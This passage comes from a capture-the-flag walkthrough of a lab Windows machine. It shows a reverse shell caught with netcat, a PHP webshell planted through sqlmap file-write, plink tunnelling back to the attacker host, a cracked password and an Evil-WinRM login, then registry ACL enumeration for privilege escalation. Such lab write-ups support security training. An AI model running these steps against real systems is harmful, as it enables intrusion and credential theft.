- Setup the Python HTTP server: python -m SimpleHTTPServer 8081
- A netcat listener: nc –lvnp 8080
- And finally “calling it from the website” to make it work (very simple words).
The Activator:
ref: https://www.sherlocklee.top/2019/09/28/Reverse-Shell/
root@kali:~/htb# python3 -m http.server 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... 10.10.10.167 - - [27/Feb/2020 03:17:19] "GET /powercat.ps1 HTTP/1.1" 200 -
root@kali:~/htb/control# rlwrap nc -nlvp 443 listening on [any] 443 ... connect to [10.10.14.11] from (UNKNOWN) [10.10.10.167] 50670 Microsoft Windows [Version 10.0.17763.805] (c) 2018 Microsoft Corporation. All rights reserved. C:\inetpub\wwwroot>whoami whoami nt authority\iusr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
C:\>cd users
cd users
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\Users
11/05/2019 02:34 PM <DIR> .
11/05/2019 02:34 PM <DIR> ..
11/05/2019 02:34 PM <DIR> Administrator
11/01/2019 11:09 AM <DIR> Hector
10/21/2019 04:29 PM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 42,980,626,432 bytes free
C:\Users>cd Administrator
cd Administrator
Access is denied.
C:\Users>cd Hector
cd Hector
Access is denied.
|
I have access to the system, however, I’m not able to list the user directories. There are two users, an Administrator and Hector – I have access denied to both user directories.
BUILDING THE TUNNEL: (THIS IS A FAILED STEP, PLEASE PROCEED TO ” WHITE WINTER WOLF WEBSHELL” SECTION)
I fired-up netstat -ano to see the processes running and listening.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
|
C:\inetpub\wwwroot>netstat –ano
netstat –ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 792
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1904
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 456
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 332
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 948
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING 1784
TCP 0.0.0.0:49668 0.0.0.0:0 LISTENING 592
TCP 0.0.0.0:49669 0.0.0.0:0 LISTENING 584
TCP 10.10.10.167:80 10.10.14.21:35928 ESTABLISHED 4
TCP 10.10.10.167:49677 10.10.14.21:8080 ESTABLISHED 4632
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 792
TCP [::]:3306 [::]:0 LISTENING 1904
TCP [::]:5985 [::]:0 LISTENING 4
TCP [::]:47001 [::]:0 LISTENING 4
TCP [::]:49664 [::]:0 LISTENING 456
TCP [::]:49665 [::]:0 LISTENING 332
TCP [::]:49666 [::]:0 LISTENING 948
TCP [::]:49667 [::]:0 LISTENING 1784
TCP [::]:49668 [::]:0 LISTENING 592
TCP [::]:49669 [::]:0 LISTENING 584
UDP 0.0.0.0:123 *:* 1980
UDP 0.0.0.0:5353 *:* 1236
UDP 0.0.0.0:5355 *:* 1236
UDP 127.0.0.1:58934 *:* 948
UDP [::]:123 *:* 1980
UDP [::]:5353 *:* 1236
UDP [::]:5355 *:* 1236
C:\inetpub\wwwroot>
|
I found that the WinRM service is active and running (TCP [::]:5985 [::]:0 LISTENING 4). This service running locally I’m not able to access externally, so the next step is to create a tunnel between my Kali and the Control machine. I will use the windows binary in kali PuTTY PLINK to create the tunnel.
1
2
3
4
|
root@kali~/htb/control locate plink.exe
/usr/share/windows–resources/binaries/plink.exe
root@ns09 ~/htb/control
|
Uploading PLink.exe
Now this seems to be a hard task for me. I tried following but I have an error:
Setup Python SMBServer
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
root@kali~/impacket/examples master ± python smbserver.py ROPNOP /usr/share/windows–resources/binaries/
Impacket v0.9.20–dev – Copyright 2019 SecureAuth Corporation
[*] Config file parsed
[*] Callback added for UUID 4B324FC8–1670–01D3–1278–5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098–A112–3610–9833–46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.167,49680)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49680)
[*] Remaining connections []
[*] Incoming connection (10.10.10.167,49681)
[*] Handle: [Errno 104] Connection reset by peer
[*] Closing down connection (10.10.10.167,49681)
[*] Remaining connections []
|
Copy PLink.exe using Command Prompt:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
|
C:\inetpub\wwwroot\uploads>dir
dir
Volume in drive C has no label.
Volume Serial Number is C05D–877F
Directory of C:\inetpub\wwwroot\uploads
12/07/2019 07:00 PM <DIR> .
12/07/2019 07:00 PM <DIR> ..
11/11/2019 12:59 PM 6 rev.php
11/11/2019 12:59 PM 6 rev2.php
11/11/2019 12:59 PM 6 shell.php
12/07/2019 07:00 PM <DIR> test
3 File(s) 18 bytes
3 Dir(s) 43,625,472,000 bytes free
C:\inetpub\wwwroot\uploads>copy \\10.10.14.21\ROPNOP\usr\share\windows–resources\binaries\plink.exe
copy \\10.10.14.21\ROPNOP\usr\share\windows–resources\binaries\plink.exe
You can‘t connect to the file share because it’s not secure. This share requires the obsolete SMB1 protocol, which is unsafe and could expose your system to attack.
Your system requires SMB2 or higher. For more info on resolving this issue, see: https://go.microsoft.com/fwlink/?linkid=852747
|
WHITEWINTERWOLF WEBSHELL
So, my plan to copy PuTTY PLINK using good boy way was failed so badly that I went to sleep shutting down my laptop. In the sleep, I was told by the angels that I could use WhiteWinterWolf’s Webshell to upload my PuTTY PLINK Here is what I did:
- I copied Webshell PHP script on to a file called “nshell.php”
- I used the same old resources text I used to run SQLMAP in my earlier step
- I created a new SQLMAP query to copy the script into C:\inetpub\wwwroot\uploads\
My new SQLMAP script:
1
2
|
sqlmap –r control2.txt —file–write=/root/htb/control/nshell.php —file–dest=c:/inetpub/wwwroot/nshell.php
|
After running the SQLMAP, my new shell was successfully uploaded.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
|
root@kali:~/htb/control# sqlmap -r control.txt –file-write=/root/htb/control/nshell.php –file-dest=c:/inetpub/wwwroot/nshell.php [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program [*] starting @ 03:29:32 /2020-02-27/ [03:29:32] [INFO] parsing HTTP request from ‘control.txt’ Type: error-based Type: stacked queries Type: time-based blind Type: UNION query [*] ending @ 03:29:52 /2020-02-27/ |
As soon as I have the confirmation from SQLMAP that my shell was uploaded successfully, I opened my browser and browsed the shell:

I upload the nc.exe and PuTTY PLINK to be sure to make at least 1 connection run properly.
I’m going to run the PLink.exe first because I wanted to test if this can help me. I know nc.exe will work for sure, but I haven’t tried Plink for tunneling. Let us try.

The tunnel was successfully created
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
|
C:\inetpub\wwwroot\uploads>.\plink.exe -R 5985:127.0.0.1:5985 10.10.14.11 FATAL ERROR: Network error: Connection refused Linux kali 4.19.0-kali1-amd64 #1 SMP Debian 4.19.13-1kali1 (2019-01-03) x86_64 The programs included with the Kali GNU/Linux system are free software; |
Now I can run EvilWiNRM localy on the Control machine. However, I’m still low privileged user, so I need to run EvilWinRM as user Hector. if you remember in my initial SQLMAP scan it revealed 3 users’ password hashes.
hector : password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
manager : password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA clear-text password: l3tm3!n
root : password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8
SQLMAP managed to get the user Manager’s password in clear text, however, our Hector’s password is still unknown, I used John to crack the password. l33th4x0rhector
0e178792e8fc304a2e3133d535d38caf1da3cd9d:l33th4x0rhector
Time to run EvilWinRM as Hector: ( and getting user.txt )
root@kali:/opt/evil-winrm# ./evil-winrm.rb -i 127.0.0.1 -u hector -p 'l33th4x0rhector' Info: Starting Evil-WinRM shell v1.6 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Hector\Documents> dir *Evil-WinRM* PS C:\Users\Hector\Documents> cd .. *Evil-WinRM* PS C:\Users\Hector> cd Desktop *Evil-WinRM* PS C:\Users\Hector\Desktop> type user.txt d8782dd01fb15b72c4b5ba77ef2d472b *Evil-WinRM* PS C:\Users\Hector\Desktop>
GETTING ROOT
In order to get Root, we need to escalate the privilege of our current user, Hector. This article and this article gives a great way of windows privesc. I had to read several such articles to find the right way to become Administrator of Control machine.
Let us see what is our user Hector is capable to do?
1
2
3
4
5
6
7
8
9
10
11
|
*Evil–WinRM* PS C:\Users\Hector\Desktop> whoami /priv
whoami /priv
PRIVILEGES INFORMATION
———————————
Privilege Name Description State
============================= ============================== =======
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
|
Is there any Administrator groups?
1
2
3
4
5
6
7
8
9
10
11
12
13
14
|
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> net localgroup Administrators
net localgroup Administrators
Alias name Administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
———————————————————————————————————————–
Administrator
The command completed successfully.
*Evil–WinRM* PS C:\Users\Hector\Desktop>
|
1
2
3
4
5
6
7
8
9
|
*Evil–WinRM* PS C:\Users\Hector\Desktop>
*Evil–WinRM* PS C:\Users\Hector\Desktop> cmdkey /list
cmdkey /list
Currently stored credentials:
* NONE *
*Evil–WinRM* PS C:\Users\Hector\Desktop>
|
So the cmdkey /list also didn’t give me any hint of stored credentials in the box. Its getting a bit hard for me at this stage.
The Windows ACL (Access Control List) is the most important command to run post-exploit. This gives a hint about how the current compromised user can help in privesc. I’m concentrating on the System’s CurrentControlSet to see what type of rights our user Hector has. The command is: get-acl HKLM:\System\CurrentControlSet\services* | Format-List * | findstr /i "Hector Users Path
“
The command returned with huge list of ACL of user Hector:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
|
*Evil–WinRM* PS C:\Users\Hector\Desktop> get–acl HKLM:\System\CurrentControlSet\services\* | Format–List * | findstr /i “Hector Users Path”
get–acl HKLM:\System\CurrentControlSet\services\* | Format–List * | findstr /i “Hector Users Path”
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Data
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET CLR Networking 4.0.0.0
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data Provider for Oracle
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\.NET Data
BUILTIN\Users Allow ReadKey
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTAGService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthAvctpSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthLEEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BthMini
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHPORT
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bthserv
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\BTHUSB
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\bttflt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\buttonconverter
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : CDPUserSvc_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CDPUserSvc_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ClipSVC
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_32
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\clr_optimization_v4.0.30319_64
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CmBatt
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\CNG
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WlanSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wlidsvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiAcpi
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WmiApRpl
BUILTIN\Users Allow –1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\wmiApSrv
BUILTIN\Users Allow –1610612736
BUILTIN\Users Allow ReadKey
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WMPNetworkSvc
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\Wof
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\workerdd
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WPDBusEnum
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpdUpFltr
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4248c
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4248c
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_4afaf
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_4afaf
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_80d08
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_80d08
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
PSChildName : WpnUserService_ee306
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\WpnUserService_ee306
NT AUTHORITY\Authenticated Users Allow ReadKey
CONTROL\Hector Allow FullControl
PSPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services
Path : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\System\CurrentControlSet\services\ws2ifsl
NT AUTHORITY\Authenticated Users Allow ReadKey
